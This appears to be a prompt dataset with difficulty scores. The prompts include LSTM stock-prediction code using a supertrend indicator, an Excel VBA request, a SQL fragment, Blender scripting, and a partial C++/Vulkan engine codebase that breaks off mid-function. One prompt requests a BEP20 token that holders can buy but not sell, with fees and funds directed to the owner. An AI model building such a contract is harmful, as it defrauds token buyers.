"intermediate": 0.4395500123500824,
"beginner": 0.26292169094085693,
"expert": 0.2975282669067383
}
|
11,283
|
Use this model and make a prediction for the next day (This model is trained on the data start='2009-01-01', end='2021-01-01' now give a prediction for what will be the price on 2021-01-02 (I have no information of that day)):
import yfinance as yf
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, LSTM
from keras.callbacks import LambdaCallback
import datetime
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
nifty = yf.download('^NSEI', start='2009-01-01', end='2021-01-01')
def supertrend(df, period=10, multiplier=3):
hl = (df['High'] + df['Low']) / 2
atr = df['High'].rolling(period).max() - df['Low'].rolling(period).min()
up = hl - multiplier * atr
dn = hl + multiplier * atr
df['ST'] = 0
df['ST'][0] = (df['High'][0] + df['Low'][0]) / 2
position = 'none'
for i in range(1, len(df)):
if df['Close'][i] > up[i]:
if position != 'buy':
position = 'buy'
df['ST'][i] = dn[i]
else:
df['ST'][i] = max(df['ST'][i - 1], dn[i])
elif df['Close'][i] < dn[i]:
if position != 'sell':
position = 'sell'
df['ST'][i] = up[i]
else:
df['ST'][i] = min(df['ST'][i - 1], up[i])
else:
df['ST'][i] = df['ST'][i - 1]
return df
nifty = supertrend(nifty)
nifty.head()
dataset = nifty['Close'].values
dataset = dataset.astype('float32')
dataset = dataset.reshape(-1, 1)
scaler = MinMaxScaler(feature_range=(0, 1))
dataset = scaler.fit_transform(dataset)
# convert an array of values into a dataset matrix
def create_dataset(dataset, look_back=1):
dataX, dataY = [], []
for i in range(len(dataset)-look_back-1):
a = dataset[i:(i+look_back), 0]
dataX.append(a)
dataY.append(dataset[i + look_back, 0])
return np.array(dataX), np.array(dataY)
train_size = int(len(dataset) * 0.8)
test_size = len(dataset) - train_size
train, test = dataset[:train_size], dataset[train_size:]
look_back = 1
trainX, trainY = create_dataset(train, look_back)
testX, testY = create_dataset(test, look_back)
trainX = np.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))
testX = np.reshape(testX, (testX.shape[0], 1, testX.shape[1]))
model = Sequential()
model.add(LSTM(100, input_shape=(1, look_back)))
model.add(Dense(1))
model.compile(loss='mean_squared_error', optimizer='adam')
model.fit(trainX, trainY, epochs=200, batch_size=1, verbose=0)
trainPredict = model.predict(trainX)
testPredict = model.predict(testX)
trainPredict = scaler.inverse_transform(trainPredict)
trainY = scaler.inverse_transform([trainY])
testPredict = scaler.inverse_transform(testPredict)
testY = scaler.inverse_transform([testY])
import matplotlib.pyplot as plt
trainPredictPlot = np.empty_like(dataset)
trainPredictPlot[:, :] = np.nan
trainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict
testPredictPlot = np.empty_like(dataset)
testPredictPlot[:, :] = np.nan
testPredictPlot[len(trainPredict)+(look_back*2)+1:len(dataset)-1, :] = testPredict
plt.plot(scaler.inverse_transform(dataset), label='Actual')
plt.plot(trainPredictPlot, label='Train Prediction')
plt.plot(testPredictPlot, label='Test Prediction')
plt.legend()
plt.show()
model.save('my_model.h5')
|
0f3301799a42e380350013b5a6e130c9
|
{
"intermediate": 0.38459697365760803,
"beginner": 0.31749266386032104,
"expert": 0.29791033267974854
}
|
11,284
|
Make a stock market prediction model using LSTM use the below code as starting point(You may need to modify it) using supertrend as indicator you also need to make prediction for the next day (For eg the data is trained on start='2009-01-01', end='2021-01-01' make prediction for price at '2021-01-02'):
Code:
import yfinance as yf
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, LSTM
from keras.callbacks import LambdaCallback
import datetime
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
nifty = yf.download('^NSEI', start='2009-01-01', end='2021-01-01')
def supertrend(df, period=10, multiplier=3):
hl = (df['High'] + df['Low']) / 2
atr = df['High'].rolling(period).max() - df['Low'].rolling(period).min()
up = hl - multiplier * atr
dn = hl + multiplier * atr
df['ST'] = 0
df['ST'][0] = (df['High'][0] + df['Low'][0]) / 2
position = 'none'
for i in range(1, len(df)):
if df['Close'][i] > up[i]:
if position != 'buy':
position = 'buy'
df['ST'][i] = dn[i]
else:
df['ST'][i] = max(df['ST'][i - 1], dn[i])
elif df['Close'][i] < dn[i]:
if position != 'sell':
position = 'sell'
df['ST'][i] = up[i]
else:
df['ST'][i] = min(df['ST'][i - 1], up[i])
else:
df['ST'][i] = df['ST'][i - 1]
return df
nifty = supertrend(nifty)
nifty.head()
dataset = nifty['Close'].values
dataset = dataset.astype('float32')
dataset = dataset.reshape(-1, 1)
scaler = MinMaxScaler(feature_range=(0, 1))
dataset = scaler.fit_transform(dataset)
# convert an array of values into a dataset matrix
def create_dataset(dataset, look_back=1):
dataX, dataY = [], []
for i in range(len(dataset)-look_back-1):
a = dataset[i:(i+look_back), 0]
dataX.append(a)
dataY.append(dataset[i + look_back, 0])
return np.array(dataX), np.array(dataY)
train_size = int(len(dataset) * 0.8)
test_size = len(dataset) - train_size
train, test = dataset[:train_size], dataset[train_size:]
look_back = 1
trainX, trainY = create_dataset(train, look_back)
testX, testY = create_dataset(test, look_back)
trainX = np.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))
testX = np.reshape(testX, (testX.shape[0], 1, testX.shape[1]))
model = Sequential()
model.add(LSTM(100, input_shape=(1, look_back)))
model.add(Dense(1))
model.compile(loss='mean_squared_error', optimizer='adam')
model.fit(trainX, trainY, epochs=200, batch_size=1, verbose=0)
trainPredict = model.predict(trainX)
testPredict = model.predict(testX)
trainPredict = scaler.inverse_transform(trainPredict)
trainY = scaler.inverse_transform([trainY])
testPredict = scaler.inverse_transform(testPredict)
testY = scaler.inverse_transform([testY])
import matplotlib.pyplot as plt
trainPredictPlot = np.empty_like(dataset)
trainPredictPlot[:, :] = np.nan
trainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict
testPredictPlot = np.empty_like(dataset)
testPredictPlot[:, :] = np.nan
testPredictPlot[len(trainPredict)+(look_back*2)+1:len(dataset)-1, :] = testPredict
plt.plot(scaler.inverse_transform(dataset), label='Actual')
plt.plot(trainPredictPlot, label='Train Prediction')
plt.plot(testPredictPlot, label='Test Prediction')
plt.legend()
plt.show()
model.save('my_model.h5')
from sklearn.metrics import mean_squared_error
import math
trainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:,0]))
print('Train Score: %.2f RMSE' % (trainScore))
testScore = math.sqrt(mean_squared_error(testY[0], testPredict[:,0]))
print('Test Score: %.2f RMSE' % (testScore))
|
f1c30b45999e5df7acc3a753f4f60d65
|
{
"intermediate": 0.37994763255119324,
"beginner": 0.28402408957481384,
"expert": 0.3360283076763153
}
|
11,285
|
Each cell in Column G23 to G53 displays a sheet name.
I would like to click on a sheet name and go to the sheet.
How will I write this VBA code
|
e3e3e7b418eeba20ce0a4a4516635a64
|
{
"intermediate": 0.302672803401947,
"beginner": 0.3805769681930542,
"expert": 0.3167502284049988
}
|
11,286
|
AND DATE(operation.DateSave)BETWEEN '2023-05-01' AND '2023-05-31' ORDER BY operation.DateSave ASC
|
589994d18385b897c8c31dd6dcba5b30
|
{
"intermediate": 0.384835422039032,
"beginner": 0.25302034616470337,
"expert": 0.36214426159858704
}
|
11,287
|
blender 3.51 script geometry nodes examples
|
9978c7e110d47eab30f301395b57d40b
|
{
"intermediate": 0.35155215859413147,
"beginner": 0.3000461459159851,
"expert": 0.3484016954898834
}
|
11,288
|
Create solidity BEP20 bsc chain smart contract exact implementation with all features mentioned below:
0. restorable
1. payable
2. ownable
3. pausable
4. has liquidity pool features on uniswap and tokens cannot be sold by holders
5. bsc chain smart contract proxy
6. change ownership of BEP20 contract
7. send initial supply to smart contract and owner.
8. mintable by anyone for paying BNB.
9. owner can remove contract address ETH.
10. take fee from every transaction and add to owner and to liquidity pool.
11. be modifiable by owner.
12. token holders can buy token but can't sell the token.
13. have all possible features which is not mentioned and and imports from openzeppelin.
14. include all necessary imports to token class.
|
beb8e01797d3f75e7e29a6365e0fc3ea
|
{
"intermediate": 0.3238583207130432,
"beginner": 0.24647784233093262,
"expert": 0.42966383695602417
}
|
11,289
|
I’m building a video game engine using C++ as the coding language and Vulkan for graphics. I am trying to set up a generic renderer using Vulkan that is flexible and will render objects based on a vector that is supplied to it. The renderer will also handle the creation of the window using GLFW and use GLM for all relevant math calls. I am using the ASSIMP library to load 3d models and animations.
Here is a portion of the code:
BufferUtils.h:
#pragma once
#include <vulkan/vulkan.h>
#include <stdint.h>
namespace BufferUtils
{
void CreateBuffer(
VkDevice device, VkPhysicalDevice physicalDevice,
VkDeviceSize size, VkBufferUsageFlags usage, VkMemoryPropertyFlags properties,
VkBuffer& buffer, VkDeviceMemory& bufferMemory);
uint32_t FindMemoryType(VkPhysicalDevice physicalDevice, uint32_t typeFilter, VkMemoryPropertyFlags properties);
void CopyBuffer(
VkDevice device, VkCommandPool commandPool, VkQueue graphicsQueue,
VkBuffer srcBuffer, VkBuffer dstBuffer, VkDeviceSize size);
}
Camera.h:
#pragma once
#include <glm/glm.hpp>
class Camera
{
public:
Camera();
~Camera();
void Initialize(float aspectRatio);
void Shutdown();
void SetPosition(const glm::vec3& position);
void SetRotation(const glm::vec3& rotation);
const glm::mat4& GetViewMatrix() const;
const glm::mat4& GetProjectionMatrix() const;
private:
glm::vec3 position;
glm::vec3 rotation;
glm::mat4 viewMatrix;
glm::mat4 projectionMatrix;
void UpdateViewMatrix();
};
Engine.h:
#pragma once
#include "Window.h"
#include "Renderer.h"
#include "Scene.h"
#include <chrono>
#include <thread>
class Engine
{
public:
Engine();
~Engine();
void Run();
void Shutdown();
int MaxFPS = 60;
private:
void Initialize();
void MainLoop();
void Update(float deltaTime);
void Render();
Window window;
Renderer renderer;
Scene scene;
};
GameObject.h:
#pragma once
#include <glm/glm.hpp>
#include "Mesh.h"
#include "Material.h"
#include "Camera.h"
#include "Renderer.h"
class GameObject
{
public:
GameObject();
~GameObject();
void Initialize();
void Initialize2(Renderer& renderer);
void Update(float deltaTime);
void Render(Renderer& renderer, const Camera& camera);
void Shutdown();
void SetPosition(const glm::vec3& position);
void SetRotation(const glm::vec3& rotation);
void SetScale(const glm::vec3& scale);
Mesh* GetMesh();
Material* GetMaterial();
private:
glm::mat4 modelMatrix;
glm::vec3 position;
glm::vec3 rotation;
glm::vec3 scale;
VkDeviceMemory mvpBufferMemory;
VkBuffer mvpBuffer;
Mesh* mesh;
Material* material;
bool initialized = false;
void UpdateModelMatrix();
};
Material.h:
#pragma once
#include <vulkan/vulkan.h>
#include "Texture.h"
#include "Shader.h"
#include <stdexcept>
#include <memory> // Don’t forget to include <memory>
#include <array>
// Add this struct outside the Material class, possibly at the top of Material.cpp
struct ShaderDeleter {
void operator()(Shader* shaderPtr) {
if (shaderPtr != nullptr) {
Shader::Cleanup(shaderPtr);
}
}
};
class Material
{
public:
Material();
~Material();
void Initialize(const std::string& vertShaderPath, const std::string& fragShaderPath, const std::string& texturePath, VkDevice device, VkDescriptorSetLayout descriptorSetLayout, VkDescriptorPool descriptorPool, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Cleanup();
void LoadTexture(const std::string& filename, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void LoadShaders(const std::string& vertFilename, const std::string& fragFilename, VkDevice device);
void UpdateBufferBinding(VkBuffer newBuffer, VkDevice device, VkDeviceSize devicesize);
VkDescriptorSet GetDescriptorSet() const;
VkPipelineLayout GetPipelineLayout() const;
std::shared_ptr <Shader> GetvertexShader();
std::shared_ptr <Shader> GetfragmentShader();
void CreateDescriptorSet(VkBuffer uniformBuffer, VkDeviceSize bufferSize);
private:
VkDevice device;
std::shared_ptr <Shader> vertexShader;
std::shared_ptr <Shader> fragmentShader;
std::shared_ptr<Texture> texture;
void CreatePipelineLayout(VkDescriptorSetLayout descriptorSetLayout);
VkDescriptorSet descriptorSet;
VkPipelineLayout pipelineLayout;
VkDescriptorSetLayout descriptorSetLayout;// = VK_NULL_HANDLE;
VkDescriptorPool descriptorPool;
void CleanupDescriptorSetLayout();
};
Mesh.h:
#pragma once
#include <vector>
#include <vulkan/vulkan.h>
#include <glm/glm.hpp>
#include "BufferUtils.h"
struct Vertex {
glm::vec3 position;
glm::vec3 color;
glm::vec2 texCoord;
};
class Mesh
{
public:
Mesh();
~Mesh();
void Initialize(std::vector<Vertex> vertices, std::vector<uint32_t> indices, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Initialize(VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Cleanup();
const std::vector<Vertex>& GetVertices() const;
const std::vector<uint32_t>& GetIndices() const;
VkBuffer GetVertexBuffer() const;
VkBuffer GetIndexBuffer() const;
void SetVertices(const std::vector<Vertex>& vertices);
void SetIndices(const std::vector<uint32_t>& indices);
std::vector<VkVertexInputBindingDescription> GetVertexInputBindingDescriptions() const;
std::vector<VkVertexInputAttributeDescription> GetVertexInputAttributeDescriptions() const;
private:
VkDevice device;
std::vector<Vertex> vertices;
std::vector<uint32_t> indices;
VkBuffer vertexBuffer;
VkDeviceMemory vertexBufferMemory;
VkBuffer indexBuffer;
VkDeviceMemory indexBufferMemory;
};
Model.h:
#pragma once
#include <assimp/Importer.hpp>
#include <assimp/scene.h>
#include <assimp/postprocess.h>
#include "Mesh.h"
#include <string>
#include <vector>
#include <vulkan/vulkan.h>
#include <stdexcept>
class Model
{
public:
Model();
~Model();
void LoadModel(const std::string& filepath, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Cleanup();
const std::vector<Mesh>& GetMeshes() const;
private:
std::vector<Mesh> meshes;
void LoadNode(aiNode* node, const aiScene* scene, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
Mesh LoadMesh(aiMesh* mesh, const aiScene* scene);
};
Pipeline.h:
#pragma once
#include <vulkan/vulkan.h>
#include <vector>
#include <array>
#include <stdexcept>
#include "Shader.h"
class Pipeline
{
public:
Pipeline();
~Pipeline();
void CreateGraphicsPipeline(const std::vector<VkVertexInputBindingDescription>& vertexBindingDescriptions,
const std::vector<VkVertexInputAttributeDescription>& vertexAttributeDescriptions,
VkExtent2D swapchainExtent,
const std::vector<Shader*>& shaders,
VkRenderPass renderPass,
VkPipelineLayout pipelineLayout,
VkDevice device);
void Cleanup();
VkPipeline GetPipeline() const;
bool IsInitialized() const;
private:
VkDevice device;
VkPipeline pipeline;
bool initialized;
void CreateShaderStages(const std::vector<Shader*>& shaders, std::vector<VkPipelineShaderStageCreateInfo>& shaderStages);
};
Renderer.h:
#pragma once
#include <vulkan/vulkan.h>
#include "Window.h"
#include <vector>
#include <stdexcept>
#include <set>
#include <optional>
#include <iostream>
#include "Pipeline.h"
#include "Material.h"
#include "Mesh.h"
struct QueueFamilyIndices
{
std::optional<uint32_t> graphicsFamily;
std::optional<uint32_t> presentFamily;
bool IsComplete()
{
return graphicsFamily.has_value() && presentFamily.has_value();
}
};
struct SwapChainSupportDetails {
VkSurfaceCapabilitiesKHR capabilities;
std::vector<VkSurfaceFormatKHR> formats;
std::vector<VkPresentModeKHR> presentModes;
};
struct MVP {
glm::mat4 model;
glm::mat4 view;
glm::mat4 projection;
};
class Renderer
{
public:
Renderer();
~Renderer();
void Initialize(GLFWwindow* window);
void Shutdown();
void BeginFrame();
void EndFrame();
VkDescriptorSetLayout CreateDescriptorSetLayout();
VkDescriptorPool CreateDescriptorPool(uint32_t maxSets);
VkDevice* GetDevice();
VkPhysicalDevice* GetPhysicalDevice();
VkCommandPool* GetCommandPool();
VkQueue* GetGraphicsQueue();
VkCommandBuffer* GetCurrentCommandBuffer();
std::shared_ptr<Pipeline> GetPipeline();
void CreateGraphicsPipeline(Mesh* mesh, Material* material);
std::pair<VkBuffer, VkDeviceMemory> RequestMvpBuffer();
private:
bool isShutDown = false;
static const uint32_t kMvpBufferCount = 3;
std::vector<VkBuffer> mvpBuffers;
std::vector<VkDeviceMemory> mvpBufferMemory;
uint32_t currentMvpBufferIndex = 0;
bool shutdownInProgress;
uint32_t currentCmdBufferIndex = 0;
std::vector<size_t> currentFramePerImage;
std::vector<VkImage> swapChainImages;
std::vector<VkImageView> swapChainImageViews;
VkExtent2D swapChainExtent;
VkRenderPass renderPass;
uint32_t imageIndex;
std::shared_ptr<Pipeline> pipeline;
VkFormat swapChainImageFormat;
std::vector<VkCommandBuffer> commandBuffers;
void CreateImageViews();
void CleanupImageViews();
void CreateRenderPass();
void CleanupRenderPass();
void CreateSurface();
void DestroySurface();
void CreateInstance();
void CleanupInstance();
void ChoosePhysicalDevice();
void CreateDevice();
void CleanupDevice();
void CreateSwapchain();
void CleanupSwapchain();
void CreateCommandPool();
void CleanupCommandPool();
void CreateFramebuffers();
void CleanupFramebuffers();
void CreateCommandBuffers();
void CleanupCommandBuffers();
void Present();
GLFWwindow* window;
VkInstance instance = VK_NULL_HANDLE;
VkPhysicalDevice physicalDevice = VK_NULL_HANDLE;
VkDevice device = VK_NULL_HANDLE;
VkSurfaceKHR surface;
VkSwapchainKHR swapchain;
VkCommandPool commandPool;
VkCommandBuffer currentCommandBuffer;
std::vector<VkFramebuffer> framebuffers;
// Additional Vulkan objects needed for rendering…
const uint32_t kMaxFramesInFlight = 2;
std::vector<VkSemaphore> imageAvailableSemaphores;
std::vector<VkSemaphore> renderFinishedSemaphores;
std::vector<VkFence> inFlightFences;
size_t currentFrame;
VkQueue graphicsQueue;
VkQueue presentQueue;
void CreateSyncObjects();
void CleanupSyncObjects();
SwapChainSupportDetails querySwapChainSupport(VkPhysicalDevice device, VkSurfaceKHR surface);
VkSurfaceFormatKHR chooseSwapSurfaceFormat(const std::vector<VkSurfaceFormatKHR>& availableFormats);
VkPresentModeKHR chooseSwapPresentMode(const std::vector<VkPresentModeKHR>& availablePresentModes);
VkExtent2D chooseSwapExtent(const VkSurfaceCapabilitiesKHR& capabilities, GLFWwindow* window);
std::vector<const char*> deviceExtensions = {
VK_KHR_SWAPCHAIN_EXTENSION_NAME
};
std::vector<const char*> CheckPhysicalDeviceExtensionSupport(VkPhysicalDevice physicalDevice);
QueueFamilyIndices GetQueueFamilyIndices(VkPhysicalDevice physicalDevice);
};
Scene.h:
#pragma once
#include <vector>
#include "GameObject.h"
#include "Camera.h"
#include "Renderer.h"
class Scene
{
public:
Scene();
~Scene();
void Initialize();
void Update(float deltaTime);
void Render(Renderer& renderer);
void Shutdown();
void AddGameObject(GameObject* gameObject);
Camera& GetCamera();
float temp;
private:
std::vector<GameObject*> gameObjects;
Camera camera;
};
Shader.h:
#pragma once
#include <vulkan/vulkan.h>
#include <string>
class Shader
{
public:
Shader();
~Shader();
void LoadFromFile(const std::string& filename, VkDevice device, VkShaderStageFlagBits stage);
VkPipelineShaderStageCreateInfo GetPipelineShaderStageCreateInfo() const;
static void Cleanup(Shader* shader);
private:
VkDevice device;
VkShaderModule shaderModule;
VkShaderStageFlagBits stage;
};
Simplex.h:
#pragma once
#ifndef SIMPLEX_H
#define SIMPLEX_H
#include <iostream>
class SimplexNoise {
private:
int testvar;
int grad3[12][3]{ { 1, 1, 0 }, { -1, 1, 0 }, { 1, -1, 0 },
{ -1, -1, 0 }, { 1, 0, 1 }, { -1, 0, 1 }, { 1, 0, -1 },
{ -1, 0, -1 }, { 0, 1, 1 }, { 0, -1, 1 }, { 0, 1, -1 },
{ 0, -1, -1 } };
int grad4[32][4] = { { 0, 1, 1, 1 }, { 0, 1, 1, -1 },
{ 0, 1, -1, 1 }, { 0, 1, -1, -1 }, { 0, -1, 1, 1 },
{ 0, -1, 1, -1 }, { 0, -1, -1, 1 }, { 0, -1, -1, -1 },
{ 1, 0, 1, 1 }, { 1, 0, 1, -1 }, { 1, 0, -1, 1 }, { 1, 0, -1, -1 },
{ -1, 0, 1, 1 }, { -1, 0, 1, -1 }, { -1, 0, -1, 1 },
{ -1, 0, -1, -1 }, { 1, 1, 0, 1 }, { 1, 1, 0, -1 },
{ 1, -1, 0, 1 }, { 1, -1, 0, -1 }, { -1, 1, 0, 1 },
{ -1, 1, 0, -1 }, { -1, -1, 0, 1 }, { -1, -1, 0, -1 },
{ 1, 1, 1, 0 }, { 1, 1, -1, 0 }, { 1, -1, 1, 0 }, { 1, -1, -1, 0 },
{ -1, 1, 1, 0 }, { -1, 1, -1, 0 }, { -1, -1, 1, 0 },
{ -1, -1, -1, 0 } };
int p_supply[256] = { 151, 160, 137, 91, 90, 15, 131, 13, 201, 95, 96,
53, 194, 233, 7, 225, 140, 36, 103, 30, 69, 142, 8, 99, 37, 240,
21, 10, 23, 190, 6, 148, 247, 120, 234, 75, 0, 26, 197, 62, 94,
252, 219, 203, 117, 35, 11, 32, 57, 177, 33, 88, 237, 149, 56, 87,
174, 20, 125, 136, 171, 168, 68, 175, 74, 165, 71, 134, 139, 48,
27, 166, 77, 146, 158, 231, 83, 111, 229, 122, 60, 211, 133, 230,
220, 105, 92, 41, 55, 46, 245, 40, 244, 102, 143, 54, 65, 25, 63,
161, 1, 216, 80, 73, 209, 76, 132, 187, 208, 89, 18, 169, 200, 196,
135, 130, 116, 188, 159, 86, 164, 100, 109, 198, 173, 186, 3, 64,
52, 217, 226, 250, 124, 123, 5, 202, 38, 147, 118, 126, 255, 82,
85, 212, 207, 206, 59, 227, 47, 16, 58, 17, 182, 189, 28, 42, 223,
183, 170, 213, 119, 248, 152, 2, 44, 154, 163, 70, 221, 153, 101,
155, 167, 43, 172, 9, 129, 22, 39, 253, 19, 98, 108, 110, 79, 113,
224, 232, 178, 185, 112, 104, 218, 246, 97, 228, 251, 34, 242, 193,
238, 210, 144, 12, 191, 179, 162, 241, 81, 51, 145, 235, 249, 14,
239, 107, 49, 192, 214, 31, 181, 199, 106, 157, 184, 84, 204, 176,
115, 121, 50, 45, 127, 4, 150, 254, 138, 236, 205, 93, 222, 114,
67, 29, 24, 72, 243, 141, 128, 195, 78, 66, 215, 61, 156, 180 };
// To remove the need for index wrapping, double the permutation table
// length
int perm[512] = {};
/*static {
for (int i = 0; i < 512; i++)
perm[i] = p[i & 255];
}*/
// A lookup table to traverse the simplex around a given point in 4D.
// Details can be found where this table is used, in the 4D noise method.
int simplex[64][4] = { { 0, 1, 2, 3 }, { 0, 1, 3, 2 },
{ 0, 0, 0, 0 }, { 0, 2, 3, 1 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 1, 2, 3, 0 }, { 0, 2, 1, 3 }, { 0, 0, 0, 0 },
{ 0, 3, 1, 2 }, { 0, 3, 2, 1 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 1, 3, 2, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 1, 2, 0, 3 }, { 0, 0, 0, 0 },
{ 1, 3, 0, 2 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 2, 3, 0, 1 }, { 2, 3, 1, 0 }, { 1, 0, 2, 3 }, { 1, 0, 3, 2 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 2, 0, 3, 1 },
{ 0, 0, 0, 0 }, { 2, 1, 3, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 2, 0, 1, 3 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 3, 0, 1, 2 }, { 3, 0, 2, 1 },
{ 0, 0, 0, 0 }, { 3, 1, 2, 0 }, { 2, 1, 0, 3 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 3, 1, 0, 2 }, { 0, 0, 0, 0 },
{ 3, 2, 0, 1 }, { 3, 2, 1, 0 } };
int p[256] = {};
int RANDOMSEED = 0;
int NUMBEROFSWAPS = 400;
public:
SimplexNoise(int inseed);
double noise(double xin, double yin);
double noise(double xin, double yin, double zin);
double noise(double xin, double yin, double zin, double win);
};
#endif
Terrain.h:
#pragma once
#include "Simplex.h"
#include "Mesh.h"
#include "Material.h"
#include "GameObject.h"
class Terrain {
public:
Terrain(int seed, int worldSize, float scale, VkDevice* device, VkPhysicalDevice* physicalDevice, VkCommandPool* commandPool, VkQueue* graphicsQueue);
~Terrain();
void GenerateTerrain(VkDescriptorSetLayout descriptorSetLayout, VkDescriptorSetLayout samplerDescriptorSetLayout, VkDescriptorPool descriptorPool);
GameObject* GetTerrainObject();
private:
void GenerateHeightMap();
void ConvertHeightMapToMeshData();
int seed;
int worldSize;
float scale;
VkDevice* device;
VkPhysicalDevice* physicalDevice;
VkCommandPool* commandPool;
VkQueue* graphicsQueue;
SimplexNoise noise;
std::vector<std::vector<float>> heightMap;
std::vector<Vertex> vertices;
std::vector<uint32_t> indices;
Mesh* terrainMesh;
Material* terrainMaterial;
GameObject* terrainObject;
};
Texture.h:
#pragma once
#include <vulkan/vulkan.h>
#include "stb_image.h" // Include the stb_image header
#include "BufferUtils.h"
#include <string>
class Texture
{
public:
Texture();
~Texture();
void LoadFromFile(const std::string& filename, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
VkImageView GetImageView() const;
VkSampler GetSampler() const;
void Cleanup();
private:
VkDevice device;
VkImage image;
VkDeviceMemory imageMemory;
VkImageView imageView;
VkSampler sampler;
VkPhysicalDevice physicalDevice;
VkCommandPool commandPool;
VkQueue graphicsQueue;
bool initialized = false;
void CreateImage(uint32_t width, uint32_t height, uint32_t mipLevels, VkSampleCountFlagBits numSamples,
VkFormat format, VkImageTiling tiling, VkImageUsageFlags usage, VkMemoryPropertyFlags properties);
void TransitionImageLayout(VkImageLayout oldLayout, VkImageLayout newLayout,
uint32_t mipLevels, VkSampleCountFlagBits numSamples);
void CopyBufferToImage(VkBuffer buffer, uint32_t width, uint32_t height);
void CreateImageView(VkFormat format, VkImageAspectFlags aspectFlags, uint32_t mipLevels);
void CreateSampler(uint32_t mipLevels);
void GenerateMipmaps(uint32_t width, uint32_t height, uint32_t mipLevels);
VkCommandBuffer BeginSingleTimeCommands(VkCommandPool commandPool, VkDevice device);
void EndSingleTimeCommands(VkCommandPool commandPool, VkQueue graphicsQueue, VkDevice device, VkCommandBuffer commandBuffer);
};
Window.h:
#pragma once
#define GLFW_INCLUDE_VULKAN
#include <GLFW/glfw3.h>
class Window
{
public:
Window(int width = 800, int height = 600, const char* title = "Game Engine");
~Window();
void Initialize();
void PollEvents();
void Shutdown();
bool ShouldClose() const;
GLFWwindow* GetWindow() const;
float GetDeltaTime();
private:
static void FramebufferResizeCallback(GLFWwindow* window, int width, int height);
static void keyCallback(GLFWwindow* window, int key, int scancode, int action, int mods);
int width;
int height;
const char* title;
GLFWwindow* window;
double lastFrameTime;
};
GameObject.cpp:
#include "GameObject.h"
#include <glm/gtc/matrix_transform.hpp>
GameObject::GameObject()
: position(glm::vec3(0.0f, 0.0f, 0.0f)), rotation(glm::vec3(0.0f, 0.0f, 0.0f)), scale(1.0f)
{
}
GameObject::~GameObject()
{
if (initialized)
{
Shutdown();
}
}
void GameObject::Initialize()
{
mesh = new Mesh{};
material = new Material{};
SetScale(glm::vec3(1.0f));
this->initialized = true;
}
void GameObject::Initialize2(Renderer& renderer)
{
auto [mvpBuffer2, mvpBufferMemory2] = renderer.RequestMvpBuffer();
mvpBuffer = mvpBuffer2;
mvpBufferMemory = mvpBufferMemory2;
material->CreateDescriptorSet(mvpBuffer, sizeof(MVP));
renderer.CreateGraphicsPipeline(mesh, material);
}
void GameObject::Update(float deltaTime)
{
// Update position, rotation, scale, and other properties
// Example: Rotate the object around the Y-axis
rotation.y += deltaTime * glm::radians(90.0f);
rotation.z += deltaTime * glm::radians(50.0f);
UpdateModelMatrix();
}
void GameObject::Render(Renderer& renderer, const Camera& camera)
{
// Render this object using the renderer and camera
VkDevice device = *renderer.GetDevice();
// Bind mesh vertex and index buffers
VkBuffer vertexBuffers[] = { mesh->GetVertexBuffer() };
VkDeviceSize offsets[] = { 0 };
vkCmdBindVertexBuffers(*renderer.GetCurrentCommandBuffer(), 0, 1, vertexBuffers, offsets);
vkCmdBindIndexBuffer(*renderer.GetCurrentCommandBuffer(), mesh->GetIndexBuffer(), 0, VK_INDEX_TYPE_UINT32);
// Update shader uniform buffers with modelMatrix, viewMatrix and projectionMatrix transforms
struct MVP {
glm::mat4 model;
glm::mat4 view;
glm::mat4 projection;
} mvp;
mvp.model = modelMatrix;
mvp.view = camera.GetViewMatrix();
mvp.projection = camera.GetProjectionMatrix();
// Create a new buffer to hold the MVP data temporarily
/* VkBuffer mvpBuffer;
VkDeviceMemory mvpBufferMemory;*/
//BufferUtils::CreateBuffer(device, *renderer.GetPhysicalDevice(),
// sizeof(MVP), VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT,
// VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT | VK_MEMORY_PROPERTY_HOST_COHERENT_BIT,
// mvpBuffer, mvpBufferMemory);
//auto [mvpBuffer, mvpBufferMemory] = renderer.RequestMvpBuffer();
//material->CreateDescriptorSet(renderer.CreateDescriptorSetLayout(), renderer.CreateDescriptorPool(1), mvpBuffer, sizeof(MVP));
